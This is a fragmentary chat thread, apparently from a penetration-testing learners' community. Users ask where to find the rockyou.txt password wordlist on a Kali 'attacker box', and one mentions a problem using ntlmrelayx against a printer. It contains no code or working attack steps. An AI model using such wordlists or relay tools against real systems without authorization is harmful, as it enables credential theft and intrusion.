crystal cove
#

sorry i do not know where is this rockyou folder

cloud urchin
#

it'd be rockyou.txt and location depends on your attacker box. locate rockyou.txt or in kali it's zipped by default locate rockyou*

#

You can DM me if you want to show me screen shots and I can help

crystal cove
#

ah okay its a file

opal shuttle
hollow kernel
#

Icant I have an issue with ntlmrelayx and the printer

opal shuttle
#

Sorry my type erorr

hollow kernel
cloud urchin
crystal cove
#

i'm trying once more before dming you

opal shuttle
proven plinth